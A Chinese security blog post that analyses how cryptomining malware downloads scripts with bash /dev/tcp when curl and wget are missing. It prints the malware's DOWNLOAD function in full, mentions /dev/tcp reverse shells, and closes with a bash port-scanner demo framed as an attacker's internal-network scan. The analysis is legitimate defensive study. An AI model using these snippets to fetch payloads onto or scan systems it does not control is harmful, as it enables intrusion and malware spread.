linux在没有curl和wget的情况下如何用shell实现下载功能

linux在没有curl和wget的情况下如何用shell实现下载功能

最近在分析挖矿木马,发现挖矿木马在入侵后都会对系统自带的部分命令进行替换或劫持。最常见的就是将wget和curl命令重命名。在多个挖矿木马同时竞争的情况下,没有wget和curl该如何远程下载挖矿脚本呢?

直接看挖矿脚本是如何实现的。这里面涵盖了很多知识点,非常值得学习!

function DOWNLOAD() {
  read proto server path <<< "${1//"/"/ }"
  DOC=/${path// //}
  HOST=${server//:*}
  PORT=${server//*:}
  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80
  exec 3<>/dev/tcp/${HOST}/$PORT
  echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
  while IFS= read -r line ; do 
      [[ "$line" == $'\r' ]] && break
  done <&3
  nul='\0'
  while IFS= read -d '' -r x || { nul=""; [ -n "$x" ]; }; do 
      printf "%s$nul" "$x"
  done <&3
  exec 3>&-
}

为更好分析是如何实现下载的,我们用bash -x来执行脚本打印中间过程。

左边bash -x 调试打印输出,右边是原脚本代码

用read读取第一个参数url解析赋值得到path,server和port。

然后判断host和port的值是否相等。因为请求的url中可能不会带有端口号,此时匹配值就是相同的,该条件为真时就默认port为80端口。

有人会提问说:要按照上面的代码要请求是https也默认80端口不就报错了吗?

是的,这样只能实现最简单的http的请求,https涉及到证书密钥的传输,实现起来过于复杂。在极端场景下,能实现http下载已经可以了。

为什么我上图中url参数用的https为何也请求成功了?

因为我博客同时允许了http和https共存,实际上面请求还是用的http协议(我也是后面才发现的),如果没有允许http协议这里就会报错。

[[ x”${HOST}” == x”${PORT}” ]] 为什么这个判断前面都要加个x呢?

示例:
if [ “x${var}” == “x” ]
if [ x”$DPVS_TYPE” == x”SNAT” ]

目的:防止出现语法错误。

因为如果不写x,只用 if [ “${var} == “0” ]来判断${var}的值;
当${var}为空或未设置时,语句被解释为 if [ == “0” ],出现语法错误。
加上x后,当${var}为空或未设置时,解释为if [ “x” == “x” ] ,依然正确。

所以:if [ “x${var}” == “x” ] 整句的意思是判断${var}是否为空。

解释下 exec 3<>/dev/tcp/${HOST}/$PORT 的含义。

看到/dev/tcp/${HOST}/$PORT的第一反应就是想到用bash反弹shell,不知道做安全的小伙伴是不是这种感觉。

在Bash Shell中打开或关闭TCP / UDP套接字

可以使用bash shell 中的以下语法打开TCP / UDP套接字。

$ exec ${file-descriptor} </dev/${protocol}/${host}/${port}

“文件描述符”是与每个套接字相关联的唯一的非负整数。文件描述符0,1和2分别保留给stdin,stdout和stderr。因此必须指定3或更高(以未使用者为准)作为文件描述符。

“<>”意味着套接字对于读写都是打开的,根据需要,可以打开只读(<)或只写(>)的套接字。“协议”字段可以是tcp或udp。

打开后,可以使用以下语法关闭读/写套接字。

$ exec ${file-descriptor} <& –  //关闭输入连接
$ exec ${file-descriptor}>& – //关闭输出连接

其中echo使用了e n两个参数:
-e:开启转义
-n:默认echo会在最后输出最后加上一个\n换行,使用了该参数后就不会自动加上换行

因为在标准http协议中header和body是用\r\n\r\n分隔开的。

  while IFS= read -r line ; do 
      [[ "$line" == $'\r' ]] && break
  done <&3

-r 屏蔽\,如果没有该选项,则\作为一个转义字符,有的话 \就是个正常的字符了。

这里就是按行读取header部分,匹配到\r就停止读取了。

shell – IFS分隔符,IFS是internal field separator的缩写,shell的特殊环境变量。ksh根据IFS存储的值,可以是空格、tab、换行符或者其他自定义符号,来解析输入和输出的变量值。

  nul='\0'
  while IFS= read -d '' -r x || { nul=""; [ -n "$x" ]; }; do 
      printf "%s$nul" "$x"
  done <&3
  exec 3>&-

read -d 后面跟一个标志符,其实只有其后的第一个字符有用,作为结束的标志。

这里就是读取body部分。exec 3>&- 关闭输出fd3。

短短几行shell代码就实现了linux的下载功能。并且这里下载需要将结果追加到文件。

下载文件并解压成功

举一反三:

既然在没有curl和wget的情况下用shell实现了下载,那么同样可以借此实现其他功能。

思考一个场景,如果我是挖矿木马的开发者,在内网的情况下没法下载扫描工具的源码(如masscan)进行编译时候可以用同样的方式来扫描内网呢?

下面是我的思路,一个简单的demo:

#!/bin/bash

host=$1
port_first=1
port_last=65535
for ((port=$port_first; port<=$port_last; port++))
do
  $(echo >/dev/tcp/$host/$port) >/dev/null 2>&1 && echo "$port open"
done

Print Friendly, PDF & Email
赞赏

微信赞赏支付宝赞赏

Zgao

愿有一日,安全圈的师傅们都能用上Zgao写的工具。